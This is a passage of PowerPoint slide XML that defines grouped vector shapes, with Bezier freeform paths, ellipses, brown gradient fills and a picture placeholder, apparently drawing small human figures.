                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 29 w 66"/>
                    <a:gd name="T11" fmla="*/ 39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6" h="41">
                      <a:moveTo>
                        <a:pt x="29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6" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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0" name="Freeform 2088">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F7261E3-1373-4657-A0C9-265B9AC53DB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1321" y="1281"/>
                  <a:ext cx="121" cy="72"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 75 w 91"/>
                    <a:gd name="T1" fmla="*/ 0 h 54"/>
                    <a:gd name="T2" fmla="*/ 27 w 91"/>
                    <a:gd name="T3" fmla="*/ 14 h 54"/>
                    <a:gd name="T4" fmla="*/ 40 w 91"/>
                    <a:gd name="T5" fmla="*/ 46 h 54"/>
                    <a:gd name="T6" fmla="*/ 91 w 91"/>
                    <a:gd name="T7" fmla="*/ 32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1" h="54">
                      <a:moveTo>
                        <a:pt x="75" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="4"/>
                        <a:pt x="45" y="9"/>
                        <a:pt x="27" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="22"/>
                        <a:pt x="17" y="54"/>
                        <a:pt x="40" y="46"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="44"/>
                        <a:pt x="65" y="38"/>
                        <a:pt x="91" y="32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711" name="Oval 2089">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA5F3B74-BB65-415D-AA53-9B8BA97A07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 flipH="1">
                  <a:off x="1302" y="1032"/>
                  <a:ext cx="105" cy="105"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="6350" algn="ctr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94" name="Group 2090">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DDF566A-54A2-48E2-83C5-BDB6A2F8A9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4" y="2727"/>
                <a:ext cx="339" cy="628"/>
                <a:chOff x="804" y="1033"/>
                <a:chExt cx="339" cy="628"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="695" name="Group 2091">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{952A85FD-4C87-46B2-A61C-A3C42F555FB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85" y="1121"/>
                  <a:ext cx="258" cy="202"/>
                  <a:chOff x="1315" y="1508"/>
                  <a:chExt cx="596" cy="469"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="704" name="Freeform 2092">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51A0A055-2EAB-47A9-9817-471AD28C58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5" name="Freeform 2093">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE3197B-F563-4101-AC62-0DD5218865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6" name="Freeform 2094">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3E8F1A2-FE54-4BB9-A5B0-D32ED61B37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1315" y="1589"/>
                    <a:ext cx="297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99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96" name="Group 2095">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C554D75-2AEB-470C-A486-13C16504CD3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04" y="1034"/>
                  <a:ext cx="301" cy="627"/>
                  <a:chOff x="2966" y="2390"/>
                  <a:chExt cx="413" cy="859"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="700" name="Freeform 2096">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1419A10-4BE8-48C8-B49E-4D475CD0AE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 flipH="1">
                    <a:off x="2966" y="2503"/>
                    <a:ext cx="413" cy="349"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 186 w 226"/>
                      <a:gd name="T1" fmla="*/ 107 h 191"/>
                      <a:gd name="T2" fmla="*/ 164 w 226"/>
                      <a:gd name="T3" fmla="*/ 113 h 191"/>
                      <a:gd name="T4" fmla="*/ 154 w 226"/>
                      <a:gd name="T5" fmla="*/ 49 h 191"/>
                      <a:gd name="T6" fmla="*/ 128 w 226"/>
                      <a:gd name="T7" fmla="*/ 24 h 191"/>
                      <a:gd name="T8" fmla="*/ 85 w 226"/>
                      <a:gd name="T9" fmla="*/ 13 h 191"/>
                      <a:gd name="T10" fmla="*/ 45 w 226"/>
                      <a:gd name="T11" fmla="*/ 2 h 191"/>
                      <a:gd name="T12" fmla="*/ 15 w 226"/>
                      <a:gd name="T13" fmla="*/ 12 h 191"/>
                      <a:gd name="T14" fmla="*/ 2 w 226"/>
                      <a:gd name="T15" fmla="*/ 85 h 191"/>
                      <a:gd name="T16" fmla="*/ 2 w 226"/>
                      <a:gd name="T17" fmla="*/ 85 h 191"/>
                      <a:gd name="T18" fmla="*/ 1 w 226"/>
                      <a:gd name="T19" fmla="*/ 89 h 191"/>
                      <a:gd name="T20" fmla="*/ 1 w 226"/>
                      <a:gd name="T21" fmla="*/ 89 h 191"/>
                      <a:gd name="T22" fmla="*/ 8 w 226"/>
                      <a:gd name="T23" fmla="*/ 106 h 191"/>
                      <a:gd name="T24" fmla="*/ 23 w 226"/>
                      <a:gd name="T25" fmla="*/ 106 h 191"/>
                      <a:gd name="T26" fmla="*/ 29 w 226"/>
                      <a:gd name="T27" fmla="*/ 105 h 191"/>
                      <a:gd name="T28" fmla="*/ 29 w 226"/>
                      <a:gd name="T29" fmla="*/ 105 h 191"/>
                      <a:gd name="T30" fmla="*/ 32 w 226"/>
                      <a:gd name="T31" fmla="*/ 104 h 191"/>
                      <a:gd name="T32" fmla="*/ 38 w 226"/>
                      <a:gd name="T33" fmla="*/ 102 h 191"/>
                      <a:gd name="T34" fmla="*/ 39 w 226"/>
                      <a:gd name="T35" fmla="*/ 68 h 191"/>
                      <a:gd name="T36" fmla="*/ 36 w 226"/>
                      <a:gd name="T37" fmla="*/ 69 h 191"/>
                      <a:gd name="T38" fmla="*/ 39 w 226"/>
                      <a:gd name="T39" fmla="*/ 47 h 191"/>
                      <a:gd name="T40" fmla="*/ 38 w 226"/>
                      <a:gd name="T41" fmla="*/ 165 h 191"/>
                      <a:gd name="T42" fmla="*/ 47 w 226"/>
                      <a:gd name="T43" fmla="*/ 175 h 191"/>
                      <a:gd name="T44" fmla="*/ 98 w 226"/>
                      <a:gd name="T45" fmla="*/ 189 h 191"/>
                      <a:gd name="T46" fmla="*/ 125 w 226"/>
                      <a:gd name="T47" fmla="*/ 170 h 191"/>
                      <a:gd name="T48" fmla="*/ 125 w 226"/>
                      <a:gd name="T49" fmla="*/ 153 h 191"/>
                      <a:gd name="T50" fmla="*/ 125 w 226"/>
                      <a:gd name="T51" fmla="*/ 124 h 191"/>
                      <a:gd name="T52" fmla="*/ 123 w 226"/>
                      <a:gd name="T53" fmla="*/ 88 h 191"/>
                      <a:gd name="T54" fmla="*/ 121 w 226"/>
                      <a:gd name="T55" fmla="*/ 75 h 191"/>
                      <a:gd name="T56" fmla="*/ 121 w 226"/>
                      <a:gd name="T57" fmla="*/ 71 h 191"/>
                      <a:gd name="T58" fmla="*/ 121 w 226"/>
                      <a:gd name="T59" fmla="*/ 75 h 191"/>
                      <a:gd name="T60" fmla="*/ 123 w 226"/>
                      <a:gd name="T61" fmla="*/ 88 h 191"/>
                      <a:gd name="T62" fmla="*/ 128 w 226"/>
                      <a:gd name="T63" fmla="*/ 121 h 191"/>
                      <a:gd name="T64" fmla="*/ 129 w 226"/>
                      <a:gd name="T65" fmla="*/ 123 h 191"/>
                      <a:gd name="T66" fmla="*/ 129 w 226"/>
                      <a:gd name="T67" fmla="*/ 123 h 191"/>
                      <a:gd name="T68" fmla="*/ 129 w 226"/>
                      <a:gd name="T69" fmla="*/ 127 h 191"/>
                      <a:gd name="T70" fmla="*/ 137 w 226"/>
                      <a:gd name="T71" fmla="*/ 147 h 191"/>
                      <a:gd name="T72" fmla="*/ 151 w 226"/>
                      <a:gd name="T73" fmla="*/ 153 h 191"/>
                      <a:gd name="T74" fmla="*/ 199 w 226"/>
                      <a:gd name="T75" fmla="*/ 139 h 191"/>
                      <a:gd name="T76" fmla="*/ 186 w 226"/>
                      <a:gd name="T77" fmla="*/ 107 h 1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226" h="191">
                        <a:moveTo>
                          <a:pt x="186" y="107"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="184" y="108"/>
                          <a:pt x="175" y="110"/>
                          <a:pt x="164" y="113"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="84"/>
                          <a:pt x="155" y="57"/>
                          <a:pt x="154" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="151" y="32"/>
                          <a:pt x="136" y="27"/>
                          <a:pt x="128" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="120" y="21"/>
                          <a:pt x="98" y="16"/>
                          <a:pt x="85" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="9"/>
                          <a:pt x="54" y="3"/>
                          <a:pt x="45" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="0"/>
                          <a:pt x="18" y="4"/>
                          <a:pt x="15" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="14"/>
                          <a:pt x="8" y="50"/>
                          <a:pt x="2" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="85"/>
                          <a:pt x="2" y="85"/>
                          <a:pt x="2" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="98"/>
                          <a:pt x="3" y="104"/>
                          <a:pt x="8" y="106"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="12" y="108"/>
                          <a:pt x="17" y="107"/>
                          <a:pt x="23" y="106"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="30" y="104"/>
                          <a:pt x="31" y="104"/>
                          <a:pt x="32" y="104"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="34" y="103"/>
                          <a:pt x="36" y="103"/>
                          <a:pt x="38" y="102"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="68"/>
                          <a:pt x="39" y="68"/>
                          <a:pt x="39" y="68"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="38" y="68"/>
                          <a:pt x="37" y="69"/>
                          <a:pt x="36" y="69"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="38" y="54"/>
                          <a:pt x="39" y="44"/>
                          <a:pt x="39" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="53"/>
                          <a:pt x="38" y="122"/>
                          <a:pt x="38" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="170"/>
                          <a:pt x="41" y="175"/>
                          <a:pt x="47" y="175"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="59" y="178"/>
                          <a:pt x="91" y="188"/>
                          <a:pt x="98" y="189"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="106" y="191"/>
                          <a:pt x="122" y="181"/>
                          <a:pt x="125" y="170"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="125" y="168"/>
                          <a:pt x="125" y="155"/>
                          <a:pt x="125" y="153"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="125" y="124"/>
                          <a:pt x="125" y="124"/>
                          <a:pt x="125" y="124"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="125" y="111"/>
                          <a:pt x="124" y="99"/>
                          <a:pt x="123" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="122" y="82"/>
                          <a:pt x="122" y="78"/>
                          <a:pt x="121" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="121" y="73"/>
                          <a:pt x="121" y="72"/>
                          <a:pt x="121" y="71"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="121" y="72"/>
                          <a:pt x="121" y="73"/>
                          <a:pt x="121" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="122" y="79"/>
                          <a:pt x="123" y="83"/>
                          <a:pt x="123" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="124" y="96"/>
                          <a:pt x="126" y="107"/>
                          <a:pt x="128" y="121"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="122"/>
                          <a:pt x="129" y="122"/>
                          <a:pt x="129" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="123"/>
                          <a:pt x="129" y="123"/>
                          <a:pt x="129" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="127"/>
                          <a:pt x="129" y="127"/>
                          <a:pt x="129" y="127"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="131" y="137"/>
                          <a:pt x="134" y="143"/>
                          <a:pt x="137" y="147"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="141" y="151"/>
                          <a:pt x="145" y="152"/>
                          <a:pt x="151" y="153"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="166" y="149"/>
                          <a:pt x="181" y="144"/>
                          <a:pt x="199" y="139"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="226" y="131"/>
                          <a:pt x="210" y="99"/>
                          <a:pt x="186" y="107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996633"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="996633">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="996633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1" name="Freeform 2097">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCEB4B54-B962-482E-84EC-E1DDB11273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 flipH="1">
                    <a:off x="3178" y="2486"/>
                    <a:ext cx="109" cy="66"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 27 w 60"/>
                      <a:gd name="T1" fmla="*/ 34 h 36"/>
                      <a:gd name="T2" fmla="*/ 9 w 60"/>
                      <a:gd name="T3" fmla="*/ 20 h 36"/>
                      <a:gd name="T4" fmla="*/ 14 w 60"/>
                      <a:gd name="T5" fmla="*/ 11 h 36"/>
                      <a:gd name="T6" fmla="*/ 48 w 60"/>
                      <a:gd name="T7" fmla="*/ 14 h 36"/>
                      <a:gd name="T8" fmla="*/ 51 w 60"/>
                      <a:gd name="T9" fmla="*/ 26 h 36"/>
                      <a:gd name="T10" fmla="*/ 27 w 60"/>
                      <a:gd name="T11" fmla="*/ 34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0" h="36">
                        <a:moveTo>
                          <a:pt x="27" y="34"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="13" y="33"/>
                          <a:pt x="0" y="22"/>
                          <a:pt x="9" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="15" y="19"/>
                          <a:pt x="12" y="13"/>
                          <a:pt x="14" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="8"/>
                          <a:pt x="48" y="0"/>
                          <a:pt x="48" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="18"/>
                          <a:pt x="43" y="22"/>
                          <a:pt x="51" y="26"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="60" y="29"/>
                          <a:pt x="41" y="36"/>
                          <a:pt x="27" y="3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2" name="Freeform 2098">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9D168DF-726C-414C-A6D5-D13D9A4FD8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 flipH="1">
                    <a:off x="3150" y="2802"/>
                    <a:ext cx="165" cy="447"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 89 w 90"/>
                      <a:gd name="T1" fmla="*/ 156 h 245"/>
                      <a:gd name="T2" fmla="*/ 89 w 90"/>
                      <a:gd name="T3" fmla="*/ 7 h 245"/>
                      <a:gd name="T4" fmla="*/ 89 w 90"/>
                      <a:gd name="T5" fmla="*/ 5 h 245"/>
                      <a:gd name="T6" fmla="*/ 63 w 90"/>
                      <a:gd name="T7" fmla="*/ 20 h 245"/>
                      <a:gd name="T8" fmla="*/ 12 w 90"/>
                      <a:gd name="T9" fmla="*/ 10 h 245"/>
                      <a:gd name="T10" fmla="*/ 2 w 90"/>
                      <a:gd name="T11" fmla="*/ 0 h 245"/>
                      <a:gd name="T12" fmla="*/ 3 w 90"/>
                      <a:gd name="T13" fmla="*/ 36 h 245"/>
                      <a:gd name="T14" fmla="*/ 2 w 90"/>
                      <a:gd name="T15" fmla="*/ 205 h 245"/>
                      <a:gd name="T16" fmla="*/ 43 w 90"/>
                      <a:gd name="T17" fmla="*/ 205 h 245"/>
                      <a:gd name="T18" fmla="*/ 45 w 90"/>
                      <a:gd name="T19" fmla="*/ 51 h 245"/>
                      <a:gd name="T20" fmla="*/ 36 w 90"/>
                      <a:gd name="T21" fmla="*/ 40 h 245"/>
                      <a:gd name="T22" fmla="*/ 45 w 90"/>
                      <a:gd name="T23" fmla="*/ 51 h 245"/>
                      <a:gd name="T24" fmla="*/ 43 w 90"/>
                      <a:gd name="T25" fmla="*/ 205 h 245"/>
                      <a:gd name="T26" fmla="*/ 44 w 90"/>
                      <a:gd name="T27" fmla="*/ 211 h 245"/>
                      <a:gd name="T28" fmla="*/ 88 w 90"/>
                      <a:gd name="T29" fmla="*/ 218 h 245"/>
                      <a:gd name="T30" fmla="*/ 89 w 90"/>
                      <a:gd name="T31" fmla="*/ 156 h 2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90" h="245">
                        <a:moveTo>
                          <a:pt x="89" y="156"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="89" y="141"/>
                          <a:pt x="90" y="47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7" y="16"/>
                          <a:pt x="71" y="22"/>
                          <a:pt x="63" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="55" y="20"/>
                          <a:pt x="24" y="13"/>
                          <a:pt x="12" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6" y="10"/>
                          <a:pt x="4" y="5"/>
                          <a:pt x="2" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="18"/>
                          <a:pt x="3" y="32"/>
                          <a:pt x="3" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="49"/>
                          <a:pt x="0" y="181"/>
                          <a:pt x="2" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="228"/>
                          <a:pt x="43" y="225"/>
                          <a:pt x="43" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="171"/>
                          <a:pt x="46" y="55"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="47"/>
                          <a:pt x="36" y="47"/>
                          <a:pt x="36" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="47"/>
                          <a:pt x="45" y="47"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="55"/>
                          <a:pt x="43" y="171"/>
                          <a:pt x="43" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="207"/>
                          <a:pt x="44" y="211"/>
                          <a:pt x="44" y="211"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="245"/>
                          <a:pt x="87" y="235"/>
                          <a:pt x="88" y="218"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="201"/>
                          <a:pt x="88" y="171"/>
                          <a:pt x="89" y="15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996633"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="996633">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="996633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3" name="Oval 2099">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B4B72FC-5A9A-4D10-95E7-5B814A99D0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gray">
                  <a:xfrm>
                    <a:off x="3159" y="2390"/>
                    <a:ext cx="145" cy="145"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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rgbClr val="808080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97" name="Group 2100">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63648D20-4789-450C-A178-2786CCD8821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58" y="1033"/>
                  <a:ext cx="129" cy="69"/>
                  <a:chOff x="3198" y="2487"/>
                  <a:chExt cx="181" cy="96"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="698" name="Freeform 2101">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D21E2ED7-0618-458F-BA82-4C890940B4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3324" y="2499"/>
                    <a:ext cx="55" cy="43"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 12 w 28"/>
                      <a:gd name="T1" fmla="*/ 22 h 22"/>
                      <a:gd name="T2" fmla="*/ 12 w 28"/>
                      <a:gd name="T3" fmla="*/ 22 h 22"/>
                      <a:gd name="T4" fmla="*/ 21 w 28"/>
                      <a:gd name="T5" fmla="*/ 5 h 22"/>
                      <a:gd name="T6" fmla="*/ 0 w 28"/>
                      <a:gd name="T7" fmla="*/ 4 h 22"/>
                      <a:gd name="T8" fmla="*/ 12 w 28"/>
                      <a:gd name="T9" fmla="*/ 2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8" h="22">
                        <a:moveTo>
                          <a:pt x="12" y="22"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="12" y="22"/>
                          <a:pt x="12" y="22"/>
                          <a:pt x="12" y="22"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="21"/>
                          <a:pt x="28" y="13"/>
                          <a:pt x="21" y="5"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="15" y="0"/>
                          <a:pt x="4" y="3"/>
                          <a:pt x="0" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="4"/>
                          <a:pt x="10" y="15"/>
                          <a:pt x="12" y="22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996633"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="996633">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="996633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9" name="Freeform 2102">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3A7E7B1-CB31-446F-A43F-6B7C32EEDF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gray">
                  <a:xfrm>
                    <a:off x="3198" y="2487"/>
                    <a:ext cx="150" cy="96"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 77 w 77"/>
                      <a:gd name="T1" fmla="*/ 28 h 49"/>
                      <a:gd name="T2" fmla="*/ 66 w 77"/>
                      <a:gd name="T3" fmla="*/ 11 h 49"/>
                      <a:gd name="T4" fmla="*/ 38 w 77"/>
                      <a:gd name="T5" fmla="*/ 1 h 49"/>
                      <a:gd name="T6" fmla="*/ 0 w 77"/>
                      <a:gd name="T7" fmla="*/ 38 h 49"/>
                      <a:gd name="T8" fmla="*/ 0 w 77"/>
                      <a:gd name="T9" fmla="*/ 38 h 49"/>
                      <a:gd name="T10" fmla="*/ 77 w 77"/>
                      <a:gd name="T11" fmla="*/ 28 h 49"/>
                      <a:gd name="T12" fmla="*/ 77 w 77"/>
                      <a:gd name="T13" fmla="*/ 28 h 49"/>
                      <a:gd name="T14" fmla="*/ 77 w 77"/>
                      <a:gd name="T15" fmla="*/ 28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7" h="49">
                        <a:moveTo>
                          <a:pt x="77" y="28"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="75" y="21"/>
                          <a:pt x="71" y="15"/>
                          <a:pt x="66" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="58" y="4"/>
                          <a:pt x="49" y="0"/>
                          <a:pt x="38" y="1"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="2"/>
                          <a:pt x="1" y="18"/>
                          <a:pt x="0" y="38"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="38"/>
                          <a:pt x="0" y="38"/>
                          <a:pt x="0" y="38"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6" y="49"/>
                          <a:pt x="70" y="44"/>
                          <a:pt x="77" y="28"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="77" y="28"/>
                          <a:pt x="77" y="28"/>
                          <a:pt x="77" y="28"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="77" y="28"/>
                          <a:pt x="77" y="28"/>
                          <a:pt x="77" y="28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996633"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="996633">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="996633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pic>
          <p:nvPicPr>
            <p:cNvPr id="685" name="Picture 684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1298CC58-1E7C-4EB9-A5F1-B2FBD10B16A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6061264" y="2235239"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
